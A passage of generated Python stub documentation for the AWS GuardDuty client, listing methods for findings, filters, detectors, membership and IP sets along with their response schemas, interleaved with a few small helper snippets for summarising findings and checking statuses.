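    # Return 'ok' while findings are being delivered, otherwise surface
    # the raw status string for triage (for example, STOPPED or
    # UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY).
    status = destination.get('Status')
    return 'ok' if status == 'PUBLISHING' else status

healthy = destination_health({'DestinationId': 'abc', 'Status': 'PUBLISHING'})
broken = destination_health(
    {'DestinationId': 'abc',
     'Status': 'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'})
```

When the status is not PUBLISHING, `PublishingFailureStartTimestamp` indicates when delivery first failed.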
def disable_organization_admin_account(AdminAccountId=None):
"""
Disables an AWS account within the organization as the GuardDuty delegated administrator.
See also: AWS API Documentation
Exceptions
:example: response = client.disable_organization_admin_account(
AdminAccountId='string'
)
:type AdminAccountId: string
:param AdminAccountId: [REQUIRED]\nThe AWS Account ID for the organizations account to be disabled as a GuardDuty delegated administrator.\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def disassociate_from_master_account(DetectorId=None):
"""
Disassociates the current GuardDuty member account from its master account.
See also: AWS API Documentation
Exceptions
:example: response = client.disassociate_from_master_account(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty member account.\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def disassociate_members(DetectorId=None, AccountIds=None):
"""
Disassociates GuardDuty member accounts (from the current GuardDuty master account) specified by the account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.disassociate_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account whose members you want to disassociate from the master account.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the GuardDuty member accounts that you want to disassociate from the master account.\n\n(string) --\n\n
:rtype: dict
Response Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --
Contains information about the accounts that weren't processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn't been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def enable_organization_admin_account(AdminAccountId=None):
"""
Enables an AWS account within the organization as the GuardDuty delegated administrator.
See also: AWS API Documentation
Exceptions
:example: response = client.enable_organization_admin_account(
AdminAccountId='string'
)
:type AdminAccountId: string
:param AdminAccountId: [REQUIRED]\nThe AWS Account ID for the organization account to be enabled as a GuardDuty delegated administrator.\n
:rtype: dict
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generates a presigned URL given a client, its method, and arguments.
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method's model.
"""
pass
def get_detector(DetectorId=None):
"""
Retrieves an Amazon GuardDuty detector specified by the detectorId.
See also: AWS API Documentation
Exceptions
:example: response = client.get_detector(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that you want to get.\n
:rtype: dict
Response Syntax
{
'CreatedAt': 'string',
'FindingPublishingFrequency': 'FIFTEEN_MINUTES'|'ONE_HOUR'|'SIX_HOURS',
'ServiceRole': 'string',
'Status': 'ENABLED'|'DISABLED',
'UpdatedAt': 'string',
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
CreatedAt (string) --The timestamp of when the detector was created.
FindingPublishingFrequency (string) --The publishing frequency of the finding.
ServiceRole (string) --The GuardDuty service role.
Status (string) --The detector status.
UpdatedAt (string) --The last-updated timestamp for the detector.
Tags (dict) --The tags of the detector resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'CreatedAt': 'string',
'FindingPublishingFrequency': 'FIFTEEN_MINUTES'|'ONE_HOUR'|'SIX_HOURS',
'ServiceRole': 'string',
'Status': 'ENABLED'|'DISABLED',
'UpdatedAt': 'string',
'Tags': {
'string': 'string'
}
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def get_filter(DetectorId=None, FilterName=None):
"""
Returns the details of the filter specified by the filter name.
See also: AWS API Documentation
Exceptions
:example: response = client.get_filter(
DetectorId='string',
FilterName='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the filter is associated with.\n
:type FilterName: string
:param FilterName: [REQUIRED]\nThe name of the filter you want to get.\n
:rtype: dict
Response Syntax
{
'Name': 'string',
'Description': 'string',
'Action': 'NOOP'|'ARCHIVE',
'Rank': 123,
'FindingCriteria': {
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
},
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
Name (string) --
The name of the filter.
Description (string) --
The description of the filter.
Action (string) --
Specifies the action that is to be applied to the findings that match the filter.
Rank (integer) --
Specifies the position of the filter in the list of current filters. Also specifies the order in which this filter is applied to the findings.
FindingCriteria (dict) --
Represents the criteria to be used in the filter for querying findings.
Criterion (dict) --
Represents a map of finding properties that match specified conditions and values when querying findings.
(string) --
(dict) --
Contains information about the condition.
Eq (list) --
Represents the equal condition to be applied to a single field when querying for findings.
(string) --
Neq (list) --
Represents the not equal condition to be applied to a single field when querying for findings.
(string) --
Gt (integer) --
Represents a greater than condition to be applied to a single field when querying for findings.
Gte (integer) --
Represents a greater than or equal condition to be applied to a single field when querying for findings.
Lt (integer) --
Represents a less than condition to be applied to a single field when querying for findings.
Lte (integer) --
Represents a less than or equal condition to be applied to a single field when querying for findings.
Equals (list) --
Represents an equal condition to be applied to a single field when querying for findings.
(string) --
NotEquals (list) --
Represents a not equal condition to be applied to a single field when querying for findings.
(string) --
GreaterThan (integer) --
Represents a greater than condition to be applied to a single field when querying for findings.
GreaterThanOrEqual (integer) --
Represents a greater than or equal condition to be applied to a single field when querying for findings.
LessThan (integer) --
Represents a less than condition to be applied to a single field when querying for findings.
LessThanOrEqual (integer) --
Represents a less than or equal condition to be applied to a single field when querying for findings.
Tags (dict) --
The tags of the filter resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string',
'Description': 'string',
'Action': 'NOOP'|'ARCHIVE',
'Rank': 123,
'FindingCriteria': {
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
},
'Tags': {
'string': 'string'
}
}
:returns:
(string) --
"""
pass
def get_findings(DetectorId=None, FindingIds=None, SortCriteria=None):
"""
Describes Amazon GuardDuty findings specified by finding IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.get_findings(
DetectorId='string',
FindingIds=[
'string',
],
SortCriteria={
'AttributeName': 'string',
'OrderBy': 'ASC'|'DESC'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector that specifies the GuardDuty service whose findings you want to retrieve.\n
:type FindingIds: list
:param FindingIds: [REQUIRED]\nThe IDs of the findings that you want to retrieve.\n\n(string) --\n\n
:type SortCriteria: dict
:param SortCriteria: Represents the criteria used for sorting findings.\n\nAttributeName (string) --Represents the finding attribute (for example, accountId) to sort findings by.\n\nOrderBy (string) --The order by which the sorted findings are to be displayed.\n\n\n
:rtype: dict
Response Syntax
{
'Findings': [
{
'AccountId': 'string',
'Arn': 'string',
'Confidence': 123.0,
'CreatedAt': 'string',
'Description': 'string',
'Id': 'string',
'Partition': 'string',
'Region': 'string',
'Resource': {
'AccessKeyDetails': {
'AccessKeyId': 'string',
'PrincipalId': 'string',
'UserName': 'string',
'UserType': 'string'
},
'InstanceDetails': {
'AvailabilityZone': 'string',
'IamInstanceProfile': {
'Arn': 'string',
'Id': 'string'
},
'ImageDescription': 'string',
'ImageId': 'string',
'InstanceId': 'string',
'InstanceState': 'string',
'InstanceType': 'string',
'OutpostArn': 'string',
'LaunchTime': 'string',
'NetworkInterfaces': [
{
'Ipv6Addresses': [
'string',
],
'NetworkInterfaceId': 'string',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string'
},
],
'PublicDnsName': 'string',
'PublicIp': 'string',
'SecurityGroups': [
{
'GroupId': 'string',
'GroupName': 'string'
},
],
'SubnetId': 'string',
'VpcId': 'string'
},
],
'Platform': 'string',
'ProductCodes': [
{
'Code': 'string',
'ProductType': 'string'
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
'ResourceType': 'string'
},
'SchemaVersion': 'string',
'Service': {
'Action': {
'ActionType': 'string',
'AwsApiCallAction': {
'Api': 'string',
'CallerType': 'string',
'DomainDetails': {
'Domain': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
},
'ServiceName': 'string'
},
'DnsRequestAction': {
'Domain': 'string'
},
'NetworkConnectionAction': {
'Blocked': True|False,
'ConnectionDirection': 'string',
'LocalPortDetails': {
'Port': 123,
'PortName': 'string'
},
'Protocol': 'string',
'LocalIpDetails': {
'IpAddressV4': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
},
'RemotePortDetails': {
'Port': 123,
'PortName': 'string'
}
},
'PortProbeAction': {
'Blocked': True|False,
'PortProbeDetails': [
{
'LocalPortDetails': {
'Port': 123,
'PortName': 'string'
},
'LocalIpDetails': {
'IpAddressV4': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
}
},
]
}
},
'Evidence': {
'ThreatIntelligenceDetails': [
{
'ThreatListName': 'string',
'ThreatNames': [
'string',
]
},
]
},
'Archived': True|False,
'Count': 123,
'DetectorId': 'string',
'EventFirstSeen': 'string',
'EventLastSeen': 'string',
'ResourceRole': 'string',
'ServiceName': 'string',
'UserFeedback': 'string'
},
'Severity': 123.0,
'Title': 'string',
'Type': 'string',
'UpdatedAt': 'string'
},
]
}
Response Structure
(dict) --
Findings (list) --
A list of findings.
(dict) --
Contains information about the finding, which is generated when abnormal or suspicious activity is detected.
AccountId (string) --
The ID of the account in which the finding was generated.
Arn (string) --
The ARN of the finding.
Confidence (float) --
The confidence score for the finding.
CreatedAt (string) --
The time and date when the finding was created.
Description (string) --
The description of the finding.
Id (string) --
The ID of the finding.
Partition (string) --
The partition associated with the finding.
Region (string) --
The Region where the finding was generated.
Resource (dict) --
Contains information about the AWS resource associated with the activity that prompted GuardDuty to generate a finding.
AccessKeyDetails (dict) --
The IAM access key details (IAM user information) of a user that engaged in the activity that prompted GuardDuty to generate a finding.
AccessKeyId (string) --
The access key ID of the user.
PrincipalId (string) --
The principal ID of the user.
UserName (string) --
The name of the user.
UserType (string) --
The type of the user.
InstanceDetails (dict) --
The information about the EC2 instance associated with the activity that prompted GuardDuty to generate a finding.
AvailabilityZone (string) --
The Availability Zone of the EC2 instance.
IamInstanceProfile (dict) --
The profile information of the EC2 instance.
Arn (string) --
The profile ARN of the EC2 instance.
Id (string) --
The profile ID of the EC2 instance.
ImageDescription (string) --
The image description of the EC2 instance.
ImageId (string) --
The image ID of the EC2 instance.
InstanceId (string) --
The ID of the EC2 instance.
InstanceState (string) --
The state of the EC2 instance.
InstanceType (string) --
The type of the EC2 instance.
OutpostArn (string) --
The Amazon Resource Name (ARN) of the AWS Outpost. Only applicable to AWS Outposts instances.
LaunchTime (string) --
The launch time of the EC2 instance.
NetworkInterfaces (list) --
The elastic network interface information of the EC2 instance.
(dict) --
Contains information about the elastic network interface of the EC2 instance.
Ipv6Addresses (list) --
A list of IPv6 addresses for the EC2 instance.
(string) --
NetworkInterfaceId (string) --
The ID of the network interface.
PrivateDnsName (string) --
The private DNS name of the EC2 instance.
PrivateIpAddress (string) --
The private IP address of the EC2 instance.
PrivateIpAddresses (list) --
Other private IP address information of the EC2 instance.
(dict) --
Contains other private IP address information of the EC2 instance.
PrivateDnsName (string) --
The private DNS name of the EC2 instance.
PrivateIpAddress (string) --
The private IP address of the EC2 instance.
PublicDnsName (string) --
The public DNS name of the EC2 instance.
PublicIp (string) --
The public IP address of the EC2 instance.
SecurityGroups (list) --
The security groups associated with the EC2 instance.
(dict) --
Contains information about the security groups associated with the EC2 instance.
GroupId (string) --
The security group ID of the EC2 instance.
GroupName (string) --
The security group name of the EC2 instance.
SubnetId (string) --
The subnet ID of the EC2 instance.
VpcId (string) --
The VPC ID of the EC2 instance.
Platform (string) --
The platform of the EC2 instance.
ProductCodes (list) --
The product code of the EC2 instance.
(dict) --
Contains information about the product code for the EC2 instance.
Code (string) --
The product code information.
ProductType (string) --
The product code type.
Tags (list) --
The tags of the EC2 instance.
(dict) --
Contains information about a tag associated with the EC2 instance.
Key (string) --
The EC2 instance tag key.
Value (string) --
The EC2 instance tag value.
ResourceType (string) --
The type of AWS resource.
SchemaVersion (string) --
The version of the schema used for the finding.
Service (dict) --
Contains additional information about the generated finding.
Action (dict) --
Information about the activity that is described in a finding.
ActionType (string) --
The GuardDuty finding activity type.
AwsApiCallAction (dict) --
Information about the AWS_API_CALL action described in this finding.
Api (string) --
The AWS API name.
CallerType (string) --
The AWS API caller type.
DomainDetails (dict) --
The domain information for the AWS API call.
Domain (string) --
The domain information for the AWS API call.
RemoteIpDetails (dict) --
The remote IP information of the connection.
City (dict) --
The city information of the remote IP address.
CityName (string) --
The city name of the remote IP address.
Country (dict) --
The country information of the remote IP address.
CountryCode (string) --
The country code of the remote IP address.
CountryName (string) --
The country name of the remote IP address.
GeoLocation (dict) --
The location information of the remote IP address.
Lat (float) --
The latitude information of the remote IP address.
Lon (float) --
The longitude information of the remote IP address.
IpAddressV4 (string) --
The IPv4 remote address of the connection.
Organization (dict) --
The ISP organization information of the remote IP address.
Asn (string) --
The Autonomous System Number (ASN) of the internet provider of the remote IP address.
AsnOrg (string) --
The organization that registered this ASN.
Isp (string) --
The ISP information for the internet provider.
Org (string) --
The name of the internet provider.
ServiceName (string) --
The AWS service name whose API was invoked.
DnsRequestAction (dict) --
Information about the DNS_REQUEST action described in this finding.
Domain (string) --
The domain information for the API request.
NetworkConnectionAction (dict) --
Information about the NETWORK_CONNECTION action described in this finding.
Blocked (boolean) --
Indicates whether EC2 blocked the network connection to your instance.
ConnectionDirection (string) --
The network connection direction.
LocalPortDetails (dict) --
The local port information of the connection.
Port (integer) --
The port number of the local connection.
PortName (string) --
The port name of the local connection.
Protocol (string) --
The network connection protocol.
LocalIpDetails (dict) --
The local IP information of the connection.
IpAddressV4 (string) --
The IPv4 local address of the connection.
RemoteIpDetails (dict) --
The remote IP information of the connection.
City (dict) --
The city information of the remote IP address.
CityName (string) --
The city name of the remote IP address.
Country (dict) --
The country information of the remote IP address.
CountryCode (string) --
The country code of the remote IP address.
CountryName (string) --
The country name of the remote IP address.
GeoLocation (dict) --
The location information of the remote IP address.
Lat (float) --
The latitude information of the remote IP address.
Lon (float) --
The longitude information of the remote IP address.
IpAddressV4 (string) --
The IPv4 remote address of the connection.
Organization (dict) --
The ISP organization information of the remote IP address.
Asn (string) --
The Autonomous System Number (ASN) of the internet provider of the remote IP address.
AsnOrg (string) --
The organization that registered this ASN.
Isp (string) --
The ISP information for the internet provider.
Org (string) --
The name of the internet provider.
RemotePortDetails (dict) --
The remote port information of the connection.
Port (integer) --
The port number of the remote connection.
PortName (string) --
The port name of the remote connection.
PortProbeAction (dict) --
Information about the PORT_PROBE action described in this finding.
Blocked (boolean) --
Indicates whether EC2 blocked the port probe to the instance, such as with an ACL.
PortProbeDetails (list) --
A list of objects related to port probe details.
(dict) --
Contains information about the port probe details.
LocalPortDetails (dict) --
The local port information of the connection.
Port (integer) --
The port number of the local connection.
PortName (string) --
The port name of the local connection.
LocalIpDetails (dict) --
The local IP information of the connection.
IpAddressV4 (string) --
The IPv4 local address of the connection.
RemoteIpDetails (dict) --
The remote IP information of the connection.
City (dict) --
The city information of the remote IP address.
CityName (string) --
The city name of the remote IP address.
Country (dict) --
The country information of the remote IP address.
CountryCode (string) --
The country code of the remote IP address.
CountryName (string) --
The country name of the remote IP address.
GeoLocation (dict) --
The location information of the remote IP address.
Lat (float) --
The latitude information of the remote IP address.
Lon (float) --
The longitude information of the remote IP address.
IpAddressV4 (string) --
The IPv4 remote address of the connection.
Organization (dict) --
The ISP organization information of the remote IP address.
Asn (string) --
The Autonomous System Number (ASN) of the internet provider of the remote IP address.
AsnOrg (string) --
The organization that registered this ASN.
Isp (string) --
The ISP information for the internet provider.
Org (string) --
The name of the internet provider.
Evidence (dict) --
An evidence object associated with the service.
ThreatIntelligenceDetails (list) --
A list of threat intelligence details related to the evidence.
(dict) --
An instance of a threat intelligence detail that constitutes evidence for the finding.
ThreatListName (string) --
The name of the threat intelligence list that triggered the finding.
ThreatNames (list) --
A list of names of the threats in the threat intelligence list that triggered the finding.
(string) --
Archived (boolean) --
Indicates whether this finding is archived.
Count (integer) --
The total count of the occurrences of this finding type.
DetectorId (string) --
The detector ID for the GuardDuty service.
EventFirstSeen (string) --
The first-seen timestamp of the activity that prompted GuardDuty to generate this finding.
EventLastSeen (string) --
The last-seen timestamp of the activity that prompted GuardDuty to generate this finding.
ResourceRole (string) --
The resource role information for this finding.
ServiceName (string) --
The name of the AWS service (GuardDuty) that generated a finding.
UserFeedback (string) --
Feedback that was submitted about the finding.
Severity (float) --
The severity of the finding.
Title (string) --
The title of the finding.
Type (string) --
The type of finding.
UpdatedAt (string) --
The time and date when the finding was last updated.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Findings': [
{
'AccountId': 'string',
'Arn': 'string',
'Confidence': 123.0,
'CreatedAt': 'string',
'Description': 'string',
'Id': 'string',
'Partition': 'string',
'Region': 'string',
'Resource': {
'AccessKeyDetails': {
'AccessKeyId': 'string',
'PrincipalId': 'string',
'UserName': 'string',
'UserType': 'string'
},
'InstanceDetails': {
'AvailabilityZone': 'string',
'IamInstanceProfile': {
'Arn': 'string',
'Id': 'string'
},
'ImageDescription': 'string',
'ImageId': 'string',
'InstanceId': 'string',
'InstanceState': 'string',
'InstanceType': 'string',
'OutpostArn': 'string',
'LaunchTime': 'string',
'NetworkInterfaces': [
{
'Ipv6Addresses': [
'string',
],
'NetworkInterfaceId': 'string',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string'
},
],
'PublicDnsName': 'string',
'PublicIp': 'string',
'SecurityGroups': [
{
'GroupId': 'string',
'GroupName': 'string'
},
],
'SubnetId': 'string',
'VpcId': 'string'
},
],
'Platform': 'string',
'ProductCodes': [
{
'Code': 'string',
'ProductType': 'string'
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
'ResourceType': 'string'
},
'SchemaVersion': 'string',
'Service': {
'Action': {
'ActionType': 'string',
'AwsApiCallAction': {
'Api': 'string',
'CallerType': 'string',
'DomainDetails': {
'Domain': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
},
'ServiceName': 'string'
},
'DnsRequestAction': {
'Domain': 'string'
},
'NetworkConnectionAction': {
'Blocked': True|False,
'ConnectionDirection': 'string',
'LocalPortDetails': {
'Port': 123,
'PortName': 'string'
},
'Protocol': 'string',
'LocalIpDetails': {
'IpAddressV4': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
},
'RemotePortDetails': {
'Port': 123,
'PortName': 'string'
}
},
'PortProbeAction': {
'Blocked': True|False,
'PortProbeDetails': [
{
'LocalPortDetails': {
'Port': 123,
'PortName': 'string'
},
'LocalIpDetails': {
'IpAddressV4': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
}
},
]
}
},
'Evidence': {
'ThreatIntelligenceDetails': [
{
'ThreatListName': 'string',
'ThreatNames': [
'string',
]
},
]
},
'Archived': True|False,
'Count': 123,
'DetectorId': 'string',
'EventFirstSeen': 'string',
'EventLastSeen': 'string',
'ResourceRole': 'string',
'ServiceName': 'string',
'UserFeedback': 'string'
},
'Severity': 123.0,
'Title': 'string',
'Type': 'string',
'UpdatedAt': 'string'
},
]
}
:returns:
(string) --
"""
pass
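The `Findings` list in the response syntax above can be large and is not ordered by severity unless `SortCriteria` was supplied. A minimal illustrative helper (not part of the generated client; the function name and sample values are hypothetical) that condenses such a response into `(Id, Severity, Title)` rows, highest severity first:

```python
def summarize_findings(response):
    """Return (Id, Severity, Title) tuples from a get_findings()-shaped
    response dict, sorted by descending severity."""
    rows = [
        (finding['Id'], finding['Severity'], finding['Title'])
        for finding in response.get('Findings', [])
    ]
    return sorted(rows, key=lambda row: row[1], reverse=True)

# Hypothetical sample shaped like the documented response syntax.
sample_response = {
    'Findings': [
        {'Id': 'f1', 'Severity': 2.0, 'Title': 'Low-severity finding'},
        {'Id': 'f2', 'Severity': 8.0, 'Title': 'High-severity finding'},
    ]
}
summary = summarize_findings(sample_response)
```

After this, `summary[0]` is the highest-severity finding, which is convenient for triage dashboards or alert thresholds.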
def get_findings_statistics(DetectorId=None, FindingStatisticTypes=None, FindingCriteria=None):
"""
Lists Amazon GuardDuty findings statistics for the specified detector ID.
See also: AWS API Documentation
Exceptions
:example: response = client.get_findings_statistics(
DetectorId='string',
FindingStatisticTypes=[
'COUNT_BY_SEVERITY',
],
FindingCriteria={
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector that specifies the GuardDuty service whose findings\' statistics you want to retrieve.\n
:type FindingStatisticTypes: list
:param FindingStatisticTypes: [REQUIRED]\nThe types of finding statistics to retrieve.\n\n(string) --\n\n
:type FindingCriteria: dict
:param FindingCriteria: Represents the criteria that is used for querying findings.\n\nCriterion (dict) --Represents a map of finding properties that match specified conditions and values when querying findings.\n\n(string) --\n(dict) --Contains information about the condition.\n\nEq (list) --Represents the equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNeq (list) --Represents the not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGt (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGte (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLt (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLte (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\nEquals (list) --Represents an equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNotEquals (list) --Represents a not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGreaterThan (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGreaterThanOrEqual (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLessThan (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLessThanOrEqual (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\n\n\n\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'FindingStatistics': {
'CountBySeverity': {
'string': 123
}
}
}
Response Structure
(dict) --
FindingStatistics (dict) --
The finding statistics object.
CountBySeverity (dict) --
Represents a map of severity to count statistics for a set of findings.
(string) --
(integer) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'FindingStatistics': {
'CountBySeverity': {
'string': 123
}
}
}
:returns:
(string) --
(integer) --
"""
pass
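The `CountBySeverity` map in the response above keys counts by severity value. A small illustrative helper (the function name is an assumption, not part of the client) that totals those counts:

```python
def total_finding_count(statistics_response):
    """Sum all per-severity counts from a get_findings_statistics()-shaped
    response dict."""
    counts = (statistics_response
              .get('FindingStatistics', {})
              .get('CountBySeverity', {}))
    return sum(counts.values())
```

This is handy when you only need an overall volume figure rather than the per-severity breakdown.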
def get_invitations_count():
"""
Returns the count of all GuardDuty membership invitations that were sent to the current member account except the currently accepted invitation.
See also: AWS API Documentation
Exceptions
:example: response = client.get_invitations_count()
:rtype: dict
Returns
Response Syntax
{
'InvitationsCount': 123
}
Response Structure
(dict) --
InvitationsCount (integer) --The number of received invitations.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'InvitationsCount': 123
}
"""
pass
def get_ip_set(DetectorId=None, IpSetId=None):
"""
Retrieves the IPSet specified by the ipSetId.
See also: AWS API Documentation
Exceptions
:example: response = client.get_ip_set(
DetectorId='string',
IpSetId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the IPSet is associated with.\n
:type IpSetId: string
:param IpSetId: [REQUIRED]\nThe unique ID of the IPSet to retrieve.\n
:rtype: dict
Returns
Response Syntax
{
'Name': 'string',
'Format': 'TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
'Location': 'string',
'Status': 'INACTIVE'|'ACTIVATING'|'ACTIVE'|'DEACTIVATING'|'ERROR'|'DELETE_PENDING'|'DELETED',
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
Name (string) --
The user-friendly name for the IPSet.
Format (string) --
The format of the file that contains the IPSet.
Location (string) --
The URI of the file that contains the IPSet.
Status (string) --
The status of the IPSet file that was uploaded.
Tags (dict) --
The tags of the IPSet resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string',
'Format': 'TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
'Location': 'string',
'Status': 'INACTIVE'|'ACTIVATING'|'ACTIVE'|'DEACTIVATING'|'ERROR'|'DELETE_PENDING'|'DELETED',
'Tags': {
'string': 'string'
}
}
:returns:
(string) --
(string) --
"""
pass
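The `Status` field in the response above is an enum that includes terminal states such as `DELETED` and `ERROR`. An illustrative check (the helper name and the choice of "usable" states are assumptions for this sketch) that a retrieved IPSet is still in a non-terminal state:

```python
# States in which the IPSet still exists and can be (re)activated;
# this grouping is an assumption for illustration, not an AWS-defined set.
USABLE_IPSET_STATUSES = {'INACTIVE', 'ACTIVATING', 'ACTIVE'}

def ip_set_is_usable(response):
    """True if a get_ip_set()-shaped response reports a non-terminal status."""
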